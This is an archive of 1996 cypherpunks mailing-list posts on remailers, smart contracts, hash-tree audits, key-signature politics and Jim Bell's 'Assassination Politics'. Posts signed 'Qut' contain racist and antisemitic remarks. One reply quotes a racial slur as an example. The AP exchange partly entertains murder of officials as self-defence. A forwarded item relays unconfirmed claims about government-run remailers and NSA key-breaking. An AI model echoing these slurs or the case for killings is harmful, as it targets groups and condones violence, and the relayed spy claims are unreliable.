Message-ID: <Pine.SUN.3.93.960520133534.11146A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996, Black Unicorn wrote:

> On Mon, 20 May 1996, E. ALLEN SMITH wrote:
> 
> > From:	IN%"unicorn@schloss.li"  "Black Unicorn" 18-MAY-1996 11:16:57.48
> > 
> > > At 06:42 PM 5/16/96 -0700, Wei Dai wrote:
> > > > Solution: smart contracts.  This is Nick Szabo's idea of building
> > > > contractual obligations into cryptographic protocols so that the parties
> > > > have no choice but to fullfil them.  But again we don't know whether this
> > > > will actually work for this problem.
> > 
> > >But what happens when there are nuances or circumstances which contracts
> > >do not anticipate?  This "complete" reliablity is also a curse for
> > >flexibility which fast moving entities need to survive.
> 
> Careful, I didn't write any of this.

Woops, yes I did.  Sorry everyone.

> 
> > 
> > 	That's an argument for combining them with escrow agencies. If the
> > escrow agency is less likely to need to intervene, then they'll charge less...
> > the principle of insurance company risk estimation.
> > 	-Allen
> > 
> 
> ---
> My preferred and soon to be permanent e-mail address:unicorn@schloss.li
> "In fact, had Bancroft not existed,       potestas scientiae in usu est
> Franklin might have had to invent him."    in nihilum nil posse reverti
> 00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
> Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com
> 
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Tue, 21 May 1996 15:22:51 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605202038.NAA29092@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! On Mon, 20 May 1996, Dave Harman wrote:
! 
! > Qut may attend the meeting to verify the racial compositions of the group.
! > Results will be reported here.
! 
! Please do. I'll buy you a beer.

Qut has some skills in determining persentages of oriental race.
It is widely suspected rich@c2.org of being an oriental.
Thank you for the offer of a beer, however we boycott Coors because of Jewish connections.
Qut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <>
Date: Tue, 21 May 1996 15:10:27 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605202103.OAA04342@netcom2.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


! With regard to the problems of remailers being shut down when we want
! long-lived addresses, wouldn't seperating the input and output be one
! possibility? That is (like Hal's Alumni remailer) you'd send mail to
! 'remailer@anon.ai' and it would be forwarded via a disposable account
! elsewhere. All messages would appear to come from 'disposable@foo.com' and
! if that account was shut down a new one could be opened to replace it
! while incoming mail simply backed up at the main remailer account. 
! 
! The only potential problem I could see would be that the disposable ISP
! might have logs which could track the outgoing messages back to the other
! account. You'd also obviously need to open the disposable account
! anonymously or using an ISP who'd protect your identity. 

That's silly.  The problem isn't liability but lack of popular
knowledge on setting up a remailer.  The more remailers,
the liability is reduced.

GOALS 2000: 2,000
QUT	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 21 May 1996 15:03:35 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: AP
Message-ID: <9605201825.AA00501@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 20 May 96 at 10:28, Jim Ray wrote:


> >A long time ago (few hours) JFA replied to Vlad Z. Nuri (but
> >Jim Ray seemed to indicate that >his other name was L.
> >Detweiller) : 

> >I think that you are writing way out of context.  >

> >First, wether or not the AP scheme is used for the control of
> >government, as Jim Bell pushes it, does not mean that it will not
> >be implemented for other purposes, such as killing successful
> >businessman or your neighboor's son who is screwing your wife
> >(noticed that she smiles all the time since a while? ) . > >Second,
> >everybody like Jim Bell who is pushing the AP scheme is >doing so
> >on ethical basis: that the coercion the government imposes >on to
> >the individuals by regulations, and guns backed taxation >justifies
> >the killings.  I have to see yet any cypherpunks who >seems to
> >agree with AP that envision another use than govt control. >
> 
> I disagree BECAUSE of the other likely uses, & see below.

Just the one I pointed out in theses two paragraphs.  I don't like 
the scheme either.

> >And you'll also note that the anonymity issue generate more
> >interest from more CPunks because it (hopefully) will acheive the
> >same goal without any killing.
> 

> our
> anonymity-baby threatens to have govt. kill it in the crib,

It is not yours, it only *is*.

> with the support of the people. 

Here, again, Jim Bell would probably say that this sentence proves 
him right...

> I have not respected a US
> president in my lifetime, yet I get _pissed_ when they get
> shot/shot at.

I somehow agree with you here.

> Killing seems to be a first resort for some,
> and IMO ends do not justify means.

Well, here, you are threading on a very difficult path.  Of course, 
the ends does never justifies the means in an *uncoerced* context.  
But what JB says, is that AP would be a justified "self defense" 
against coercion.  It is only that the self-defense uses statistics.  
You'll note that the psycho-epistemology necessary to commit murder 
is quite close to the one necessary to coerce poeples to pay taxes.

Thus, he might pretend (JB) to only turn the living expression of an 
idea against itself.

Personnally?  I still was not able to sort it out...

Ciao

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 21 May 1996 15:09:23 +0800
To: qut@netcom.com (Dave Harman)
Subject: Re: Virtual machines?
Message-ID: <9605201823.AA00349@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 20 May 96 at 2:32, Dave Harman wrote:


> ! Is there a way to have a remailer de-localize itself and
> ! relocalize itself over the internet?
> ! 
> ! For example, could there be several machines around the worlds
> ! that, when you send an e-mail to it, is routed to differents
> ! physical places of the world depending on where the actual
> ! remailer process is actually running?  Could there be such a thing
> ! as a virtual machine runing a remailer that gets to hop from
> ! physical machine to physical machine around the world?
> ! 
> ! Just an idea to avoid jurisdiction problems.


> This is just what crypto remailers do.
> Public key encryption with To: 's encrypted at each hop threading
> through several servors.

Just to let you know: this is *not* what I meant.  I did not speak
of the location of the message, but of the location of the
*remailer* itself.




 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 21 May 1996 15:34:01 +0800
To: cypherpunks@toad.com
Subject: Electronic Banking and Commerce Conference
Message-ID: <v03006624adc66f0ce66f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


From: "Ledig, Robert" <LEDIGRO@ffhsj.com>
To: "'ecash mailing list'" <ecash@digicash.com>
Subject: Electronic Banking and Commerce Conference
Date: Mon, 20 May 96 12:22:00 edt
Encoding: 279 TEXT
Sender: owner-ecash@digicash.com
Precedence: bulk
Status: U


21st Century Banking Alert No. 96-5-20
May 20, 1996

ELECTRONIC BANKING AND COMMERCE CONFERENCE TO BE HELD IN
WASHINGTON, D.C. ON JUNE 7, 1996
_________________________*________________________

FRIED, FRANK, HARRIS, SHRIVER & JACOBSON
ARTHUR ANDERSEN LLP
and
THE SECURA GROUP

*  *  *

Present
A One-Day Conference

ELECTRONIC BANKING AND COMMERCE:
FINDING YOUR PLACE IN THE FUTURE

*  *  *

June 7, 1996

8:00 a.m. to 5:45 p.m.
Renaissance Hotel
Washington, D.C.
_________________________*________________________

ABOUT THE CONFERENCE

Background

     1996 is likely to be a pivotal year for the introduction of electronic
banking and commerce in the United States. Among the major developments that

will mark 1996 as an historic year in this field are:

     The Federal Reserve Board proposes the first major regulatory
initiative to address the treatment of stored value products.

     Stored value cards are introduced to the public in a television
commercial seen by millions during the Super Bowl followed by a high
visibility pilot project during the Atlanta Summer Olympics.

     Visa and Mastercard reach agreement on protocol for secure transmission

of credit card information over the Internet.

     Electronic cash becomes available for transmission over the
Internet.

     Banks and software providers engage in a major effort to attract bank
customers to on-line banking services.

     Usage of the World Wide Web for product marketing expands
exponentially.

     Landmark telecommunications reform legislation is enacted.

     These developments present both an opportunity and a challenge for
banks, financial services firms, technology providers and a wide range of
commercial enterprises.  The construction of the electronic financial
services delivery system of the 21st Century will be driven by technology
and will require a comprehensive reevaluation and realignment of consumer
preferences, privacy, security, costs and conveniences.  Simultaneously,
these new delivery systems will be directly affected by emerging government
regulation related to law enforcement, monetary policy, bank regulation and
consumer protection.  The conference is designed to provide participants
with a broad insight into these factors, to hear from the leaders who will
drive this process and thus offer participants a basis for evaluating the
near and long term prospects for the banking industry and other financial
services providers in the new world of electronic commerce.

About the Sponsors

     Fried, Frank, Harris, Shriver & Jacobson is a nationally recognized law

firm with over 400 lawyers in New York, Washington, D.C., Los Angeles,
London and Paris.  The firm's financial services practice is led by Thomas
P. Vartanian, who has written and spoken widely on electronic banking and
commerce issues and is a member of the editorial board of the Electronic
Banking and Commerce Report.  The firm offers the 21st Century Banking Alert

Page*, which can be found on the World Wide Web at
http//:www.ffhsj.com/bancmail/bancpage.htm.

     Arthur Andersen LLP is a unit of Andersen Worldwide, the leading
professional services organization in the world with over 360 offices in
more than 70 countries and over $8 billion in revenues.  Arthur Andersen's
Financial Markets Practice has a dedicated, international team of over 5,000

professionals who provide a full range of assurance, risk management,
business consulting, economic and financial consulting and tax advisory
services to over 10,000 financial services institutions in banking, capital
markets and insurance.

     The Secura Group is among the nation's preeminent financial services
consulting firms, offering strategic planning, financial advisory,
organizational and management consulting, risk management, and regulatory
counseling services to financial institutions throughout the United States.
 Headquartered in Washington, D.C., Secura also maintains offices in Boston,

Chicago, Dallas, Los Angeles, New York and San Francisco.
 _________________________*________________________

PROGRAM

8:00 a.m.
Breakfast
Remarks by Daniel Eldridge, Vice President, DigiCash

9:00 a.m.
Program Overview
Dorsey L. Baskin, Jr., Partner, Arthur Andersen LLP
Thomas P. Vartanian, Partner, Fried, Frank, Harris, Shriver & Jacobson

9:15 a.m.
What New Technology Means for Banks
How will technology affect the competitive position between depository
institutions?
How much of a threat do banks face from non-bank competitors?
What approaches are available to banks?

John P. Danforth, Managing Director, The Secura Group
Charles M. Nathan, Partner, Fried, Frank, Harris, Shriver & Jacobson
Thomas P. Vartanian, Partner, Fried, Frank, Harris, Shriver & Jacobson
Richard M. Whiting, Senior Director for Regulatory Affairs and General
Counsel,
The Bankers Roundtable

10:35 a.m.
What New Technology Means for Non-Banks
What are the prospects for Internet commerce?
When does a non-bank become a bank?
How will non-banks work with banks?
Implications of the new telecommunications legislation.

Robert H. Ledig, Partner, Fried, Frank, Harris, Shriver & Jacobson
Robert J. Lesko, Managing Partner, Financial Services Industry, ATT
Solutions
Thomas Nelson, Manager, Arthur Andersen LLP
Phoebe Simpson, Analyst, Jupiter Communications

11:50 a.m.
On-line Banking
Options available to banks.
Web site banking.
Key considerations and risks for banks.

Dorsey L. Baskin, Jr., Partner, Arthur Andersen LLP
Lance Conn, Counsel, AOL Services

12:30 p.m.
Lunch
Remarks by Tim Jones, Chief Executive, Mondex

2:00 p.m.
Stored Value Products and Smart Cards
The Federal Reserve Board's proposed revision to Regulation E.
Deposit insurance issues.
Design and structure of these products.

William F. Keenan, Senior Vice President, Marketing and Business
Development,
NatWest Bank (Delaware)
Jeffrey M. Kopchik, Senior Policy Analyst, Federal Deposit Insurance
Corporation

3:00 p.m.
Electronic Money
Understanding the various models for electronic money.
Legal and competitive issues.
Credit card usage on the Internet.

Jim Richardson, Senior Manager, Arthur Andersen LLP
Frank O. Trotter, III, Senior Vice President and Director,
International Markets Division, Mark Twain Bank
Peter Wayner, Author, Digital Cash:  Commerce On The Net

4:00 p.m.
Public Policy Perspectives
Implications for law enforcement.
Systemic risks associated with electronic banking and commerce.
Impact on the competitive position of banks and non-banks.
Consumer interests in the new technology.

Michael ter Maat, Ph.D., Senior Economist, American Bankers Association
Stephen R. Kroll, Legal Counsel, Financial Crimes Enforcement Network,
U.S. Department of the Treasury
Anne Wallace, Attorney-Advisor, Financial Management Service,
U.S. Department of the Treasury,
Janlori Goldman, Deputy Director, Center for Democracy and Technology

5:20 p.m.
Open Discussion Period

5:45 p.m.
Reception
_________________________*________________________

Additional Program Information

     Conference attendees will receive a copy of DigitalCash:  Commerce On
The Net, a leading book on electronic money, along with a set of program
materials.  Continuing legal education credit is being applied for in
numerous jurisdictions.  If you have specific CLE questions, please contact
Debbie Rizzo at (202) 639-7201.

     A limited number of rooms will be available for a special rate at the
Renaissance Hotel, 999 Ninth Street, N.W., Washington, D.C.  For
reservations, please call the hotel directly at (202) 898-9000 (Ext. 3400)
and reference Electronic Banking and Commerce.

     For further information on the conference, please contact Bob Ledig at
21stCen@ffhsj.com or (202) 639-7016.

FAX REGISTRATION FORM

     To register, please fax this form to Debbie Rizzo at (202) 639-7008, or

call her at (202) 639-7201.  The fee for the conference is $235 if paid in
advance ($295 at the conference location).  Early registration is
recommended as seating is limited.

I/we will be attending the Electronic Banking and Electronic Commerce
conference.


_______________________________________________________________
Name(s)

_______________________________________________________________
Title(s)

_______________________________________________________________
Organization Name

_______________________________________________________________
Address

_______________________________________________________________
Telephone and Fax Numbers

Credit Card Information:                            Visa
           Mastercard         (Circle One)

___________________________________________________________________
Account No.

___________________________________________________________________
Expiration Date

__________________________________________________________________
Signature

     If paying by check, please make payable to Fried, Frank, Harris,
Shriver & Jacobson and mail to Debbie Rizzo at Fried, Frank, Harris, Shriver

& Jacobson, Suite 800, 1001 Pennsylvania Avenue, N.W., Washington, D.C.
20004-2505.

                         Thomas P. Vartanian
                         Robert H. Ledig
                         David L. Ansell

                         Washington, D.C.
                         202-639-7200

Visit the 21st Century Banking Alert Page on the
World Wide Web at
http://www.ffhsj.com/bancmail/bancpage.htm

Copyright 1996.  Fried, Frank, Harris, Shriver & Jacobson.
  All rights reserved.
21st Century Banking Alert is a trademark and servicemark
  of Fried, Frank, Harris, Shriver & Jacobson.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Tue, 21 May 1996 15:04:37 +0800
To: cypherpunks@toad.com
Subject: An alternative to remailer shutdowns
Message-ID: <199605202202.PAA27515@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Several remailers have shut down recently.  This may be in part a
byproduct of the ongoing struggle between dissidents and adherents of
the Church of Scientology.  Also, levels of abuse seem to be increasing
in general as more people come on the net and learn to use the
remailers.  Since by their very nature remailers prevent
accountability, there is nothing to stop one or more persons from
sending illegal material which will cause the remailers to be
threatened by legal actions.

I was contacted by the FBI on Friday due to some threatening mail which
was apparently sent through my remailer.  According to 18 USC 875(c),
"Whoever transmits in interstate commerce any communication containing
any threat to kidnap any person or any threat to injure the person of
another, shall be fined not more than $1,000 or imprisoned not more
than five years, or both."  I may not be able to continue operating
either of my remailers (alumni.caltech.edu and shell.portal.com) for
much longer due to this kind of abuse.

Shutting down remailers not only reduces the number available for general
use, it also causes problems for people who are using the remailers to
manage pseudonyms.  If their reply chains used a remailer which shuts
down they have to reconstruct the chains, which is at least a nuisance.
There was also a posting recently to comp.org.eff.talk by Jonathon Cline,
jcline@trumpet.aix.calpoly.edu, about efforts to set up fully anonymous
nym based mailing lists.  He mentioned that the decrease in the number of
remailers is causing problems with their plans.

An alternative I am considering would reduce the utility of the remailer
while still allowing these "consensual" uses to continue.  Presently the
remailers deal with abuse via "block lists", sets of addresses that mail
can't be sent to.  Generally these are created when someone complains
about some mail they have received.  By setting up blocking, at least
they will not get harrassing anonymous mail once they have complained.
But in some cases, as in the case that is causing me headaches now, even
one message is too much.

My thought is to turn the block list concept on its head, and make it a
"permit list".  Simply, the remailer will only send mail to people who
have voluntarily indicated their willingness to receive it.  Someone who
has not sent in a message granting this permission will not be sent
mail.  For larger forums such as newsgroups and mailing lists, permission
may be granted by some consensus mechanism.  Most would be blocked, but a
few like alt.anonymous.messages and the cypherpunks list would be
permitted, and others could be added if they wished.

This should hopefully essentially eliminate complaints about abuse,
much more effectively than the current method of block lists.  People
who want to test the remailer by sending mail to themselves, as most
people do when they are learning, can simply register themselves on the
permit list.  People who want to receive anonymous mail, or participate
in anonymous mailing lists, can register themselves.  People who want
to use nyms can register themselves.  People who run other remailers
can register.  It's all voluntary, and if someone does get some
objectionable message at least they will know that they granted
permission.  They can always ask to be taken off the list.

Feedback welcome -

Hal Finney

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMaDr2BnMLJtOy9MBAQHWBAIAlh2uIanxTnI+GBqZ1zWcBE/AgF2TtQA/
TztTYczW7FI8ktAa3WVtsUkJeIOYxUDfC2jLvhHuGMXhEPs+jVijJg==
=QajL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Tue, 21 May 1996 16:50:14 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: encrypted open books (Was why does the state still stand)
Message-ID: <199605202207.PAA05112@dns1.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 20 May 1996 jamesd@echeque.com wrote:
>> Look up cypernomicon, "open encrypted books"

At 01:30 PM 5/20/96 -0700, Wei Dai wrote:
> There is indeed a short section in the Cyphernomicon about encrypted open
> books.  Unfortunately it doesn't describe it in detail,

An organization, such as a bank, issues signed, non anonymous promises to
pay to various nyms -- in other words bank accounts, or interest
bearing bonds, or some such.

A nym would like to know what the total amount of such signed obligation is,
so that he can be sure it is less than the total value of the institutions 
good name and readily findable and confiscatable assets.

But we do not want a bunch of outsiders getting a list of lots of private
information about who owns what, (such as auditors who are usually in the
pockets of the tax collectors).   The institution needs to be able
to prove that it only owes total amount X in this form, without letting 
Tom, Dick, and Harry know who it owes amount X to, and why.

To do this it organizes its accounts in a binary tree, and constructs a one
way checksum tree checksum, revealing to each custom the part of the tree he
is on, all the way up to the root, which must be the same for all customers,
and must be placed in some public place, so that any customer can tell that 
his account is included in the total openly admitted obligations of the 
institution, and any customer can, by revealing secret information, prove 
that he is one of the people that the institution has publicly admitted 
owing money to.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Matt Smith" <msmith@rebound.slc.unisys.com>
Date: Tue, 21 May 1996 16:06:34 +0800
To: cypherpunks@toad.com
Subject: (fwd) Re: Spoofed Flame Email (was Re: Clinton & the net) (fwd)
Message-ID: <199605202111.VAA03440@rebound.slc.unisys.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Found on sci.crypt.  Most of you have probably already seen it, but I 
sent it here for those who didn't

Matt

- --- [ begin forwarded message ] ---

From: ebright@coil.com (Jim Ebright)
Newsgroups: alt.privacy,alt.privacy.clipper,alt.security,alt.security.pgp,comp.org.cpsr.talk,comp.org.eff.talk,sci.crypt,alt.culture.internet,alt.culture.usenet
Subject: Re: Spoofed Flame Email (was Re: Clinton & the net)
Date: 17 May 1996 09:48:57 -0400
Organization: Central Ohio Internet Link, Inc.  (614)242-3814
Lines: 65
Distribution: inet
Message-ID: <4ni049$o4o@bronze.coil.com>
References: <epic-news-2304961436240001@204.91.138.112> <4mrt2u$li0@newsserv.cs.sunysb.edu> <wszq7grcwp.fsf@maple.sover.net> <r9hgtna4b5.fsf@pc496938.bs.boeblingen.ibm.com>
NNTP-Posting-Host: bronze.coil.com
Xref: news.cc.utah.edu alt.privacy:9606 alt.privacy.clipper:1204 alt.security:11072 alt.security.pgp:20972 comp.org.cpsr.talk:5281 comp.org.eff.talk:27326 sci.crypt:11937 alt.culture.internet:11856 alt.culture.usenet:21781

In article <r9hgtna4b5.fsf@pc496938.bs.boeblingen.ibm.com>,
Michael Deindl  <mdeindl@vnet.ibm.com> wrote:
...
>
>IMO anonymous remailers are a very good addition to the net.
>Unfortunately some users are a destructive addition to the net and
>abuse them.  Oh, yes, and of course all these evil kiddy-porn dealers
>use them, too.  And after all: a good citizen has nothing to hide and
>doesn't need anonymous-remailers....
>
>(For the clueless: the last 2 sentences are sarcasm/irony)
>

I thought this excerpt taken from comp.risks would be interesting here...
I snarfed it off a webpage where the user thought the comments about
insecure keys was interesting.... I find the anon-remailer comments the
most interesting...

[From the RISKS digest]

Date: Fri, 8 Mar 1996 14:37:14 -0500 (EST)
From: Frank Sudia <sudiaf@btec.com>
Subject: CIA & NSA Run Remailers (Viktor Mayer-Schoenberger via Lisa Pease)

>Date: Mon, 4 Mar 1996 16:52:42 -0800 (PST)
>From: Lisa Pease <lpease@netcom.com>
>To: jfk-conspiracy <jfk-conspiracy@netcom.com>
>Subject: CIA & NSA run remailers (fwd)

I attended last week's ``Information, National Policies, and International
Infrastructure" Symposium at Harvard Law School, organized by the Global
Information Infrastructure Commission, the Kennedy School, and the Institute
for Information Technology Law & Policy of Harvard Law School.

During the presentation by Paul Strassmann, National Defense University, and
William Marlow, Science Applications International Corporation, entitled
``Anonymous Remailers as Risk-Free International Infoterrorists'', the
question was raised from the audience (Professor Charles Nesson, Harvard Law
School) -- in a rather extended debate -- whether the CIA and similar
government agencies are involved in running anonymous remailers, as this
would be a perfect target to scan possibly illegal messages.

Both presenters explicitly acknowledged that a number of anonymous remailers
in the US are run by government agencies scanning traffic.  Marlow said that
the government runs at least a dozen remailers and that the most popular
remailers in France and Germany are run by the respective government
agencies in these countries.  In addition, they mentioned that the NSA has
successfully developed systems to break encrypted messages will less than
1000-bit [public] keys and strongly suggested using at least 1024-bit keys.
They said that they themselves use 1024-bit keys.

I ask Marlow afterwards if these comments were off or on record, he paused
then said that he can be quoted.

So I thought I pass that on. It seems interesting enough, don't you think?

Viktor Mayer-Schoenberger, Information Law Project,  
Austrian Institute for Legal Policy


- -- 
 A/~~\A  Jim Ebright NET Security: http://www.coil.com/~ebright/security.html
((0  0))_______  mailto:ebright@coil.com  "I used to hunt elephants but I   
  \  /    the  \ don't do that anymore.  There aren't enough of them" - Newt
  (--)\   OSU  | Gingrich to Andy Lodge, Theo.Roosevelt Cons. Award winner.

- -- 
Matt Smith - msmith@unislc.slc.unisys.com
"Nothing travels faster than light, with the possible exception of bad news, 
which follows its own rules." - Douglas Adams, "Mostly Harmless"
Disclaimer:  I came up with these ideas, so they're MINE!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaDf7MWUKiYjg/fZAQEGggQArICNll7falgyuk93xY7NjWIeFxDhjj7f
8s8W2+8kVZ7G6ACDyGiw+iFBI8miI93i35PGAKjuPR0HnkihJF3OYXof6/pJJ2gr
3Xq7gkRRb2rAtU1Yklj+BK9jhqSBxCFhBnisW/PVfQCTer59M9ndT/5gKTLUVxjv
BtBFoZ7ygi8=
=DEhb
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 21 May 1996 09:08:45 +0800
To: cypherpunks@toad.com
Subject: RAC_ket
Message-ID: <199605201544.PAA00135@pipe6.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-19-96. WaPo: 
 
   "From Out Of the Shadows." Book review. 
 
   Spies Without Cloaks: The KGB's Successors 
   By Amy Knight 
   Princeton University Press. 318 pp. $24.95 
 
      Knight suggests that Russia's new security forces are 
      not only continuing the same kinds of skulduggery as 
      they undertook in the past but are now also expertly 
      manipulating public opinion in Russia and the rest of 
      the world to obscure and disguise what they do. 
 
      What Knight suggests is that the old client-master 
      relationship between Russia's elite and the KGB has not 
      only been reversed but may even have vanished, because 
      these "children of the KGB" have subsumed large chunks 
      of Russia's economy and government. 
 
      If *Spies Without Cloaks* is correct, much of Russia 
      today is little more than a mutant KGB, the communist 
      ideology it once served now replaced by ruthless 
      devotion to great-power politics and bottom-line 
      capitalism. 
 
   The book is worth reading for its applicability to the 
   transformation of the US and international intelligence 
   "communities" into free-market racketeering of espionage 
   technologies and expertise and insider secrets -- as WaPo 
   reported May 2 on high-tech intel patrons Perry and Deutch. 
 
   RAC_ket 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Tue, 21 May 1996 15:18:51 +0800
To: bryce@digicash.com
Subject: Re: Senator, your public key please?
In-Reply-To: <199605182038.WAA09047@digicash.com>
Message-ID: <9605202045.AA00456@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


T.C. May (tcmay@got.net) writes :
>  The web of trust may not be transitive, but the "web of taint"
>  may be more so.
>
>  New forms of blackballing, blacklisting, redlining, etc.
>
>  And I fully expect that who signs one's keys, and whose
>  signatures are found on one's keys, may become a political
>  and legal issue in the coming years.
>
>  What if, for example, Sen. Leahy _did_ end up in the web of
>  trust for Aryan Nation? Even if he never intended it, this
>  could have some severe PR repercussions.

bryce@digicash.com writes:
>  For example, there is no reason why the hypothetical racist
>  "Tom Metzger" would sign no black people's keys.  A key
>  signature (PGP style) is just an assertion about the identity
>  of someone.  Haven't racists engraved markings on people's
>  clothes, buildings, land, bodies and other belongings in order
>  to identify the owners?  So why not do the same for keys.

Your local KCA (KKK Certification Authority) could as easily issue a "This  
key is owned by a Nigger." certificate for a public key as TRW could issue a  
"This key is owned by a Deadbeat." certificate.  Presumably, future versions  
of PGP and other public-key crypto systems will support free-form certificate  
generation and not the quasi-fixed-definition signatures currently found in  
PGP.

You can be sure that there will be rallying cries for laws to be passed to  
ensure the accuracy of statements made in key certificates, that characters  
are not defamed, that libel is not committed, etc...  Lots of the same issues  
involving any other type of speech and the international and sometimes  
untraceable nature of the Net.  What do you do about a signature on your key,  
posted anonymously to the net, which names you as one of the Four  
Horsemen(*tm)?

How will current laws relating to credit-rating bureaus and the like be  
applied to key certificates?  Will the MIT key-server be fined for supplying  
along with public keys any signatures older than 7 years?

As the potential value (positive or negative) of certificates on public keys  
increases, expect the TrueIdentity crowd to suggest that their vision of the  
future will also help prevent certificate abuse.

For key signatures to be useful, the protocols must allow for the attachment  
and distribution of certificates against the will of the key-holder.  In  
doing so there will always be the possibility of abuse.


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 21 May 1996 16:33:10 +0800
To: liberty@gate.net (Jim Ray)
Subject: Re: AP
Message-ID: <9605202031.AA06468@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 20 May 96 at 14:51, Jim Ray wrote:

> [He IS L.D., nobody else would say "anti-psuedospoofing."]
Since I hit C'punks around 6 months ago, I have no idea who this 
mythical figure is, alhought I see the name pop-up occasionnally.

Is there a Detweiller FAQ somewhere?

> Why be Jimbellish just before an election. If AP is inevitable, OK,
> but why emphasis on murder when the press hates the 'Net? The people
> will support it because jimbell comes off as a LOON, and people
> dislike loons, and vote against them.

Interesting.  Has AP ever popped-up in the conventional medias?

Then, again, I know an awfull lot of people who would applaude Bell.  
But most of them are not computer litterate.  They are from another 
generation, not brainwashed by "Don't ask what your country can 
do for you; ask what you can do for your country"...


> I'm 35, and I may actually die before I do. I hope not.

[Black humor] any AP proponents with an eye (or a buck) on you?  :)

> >You'll note that the psycho-epistemology necessary to
> >commit murder is quite close to the one necessary to coerce poeples
> >to pay taxes.
> 
> This kind of thinking might authorize a massive Cherokee
> massacre if it spread, IMO.

Please, do point out the similarities and the differences... I think 
that the context is very different.

> We must reach the "quit stealing"
> phase beore nuts can fantasize about a revenge phase which
> likely will never be.

Are you talking of an open war a la Bosnia?  

> We must either leave some wrongs in the
> past or be cursed with them forever.

This is what I was talking about taking things out of context.  Since 
you agree on that, the Cherokee thing is ruled out.  But govt action 
are a matter of the present and future.  Some peoples see it as 
legitimate self-defense.

Among the peoples who do not object to be coerced to pay taxex for 
services are two groups the one that:
a) figure out that they get more than they pay
	and
b) want to pay, even if they realize they get less than they pay for.

the a) group is much bigger than b).  At least by an order of 
magnitude.

Now, in a world where the govt would not use coercion on economical 
and fiscal matters, b) would keep giving.  But what a) would do? 
What they've already done since a hundred years: push for legislation 
that favor them.


> Bottom line for me: "Two wrongs don't make a right." 

Please state the basic premise that make you declare what is "wrong"
in the context of AP.  I am not bugging you simply to do so.  For
example, do you think that, for ethical reasons, you are not only
justified but actually *obligated* to use physical violence in
certain contexts?  I guess not.  But many peoples think they have
to...

I think that you simply try to evade the necessity of defining for 
yourself what exactly is what the govt is doing.

Personnally, I did not reach any conclusions yet.

> We must, as
> Libertarians, face the fact that taxation we object to is not seen
> by many people as coercive.

General opinion is not what define truth nor reality.  If I refuse
to pay my taxes, they'll use physical violence to get what they
want.  You might object that I enjoyed the benefits of the spending
of taxes, but I am yet to see any contract that I entered with
"society".


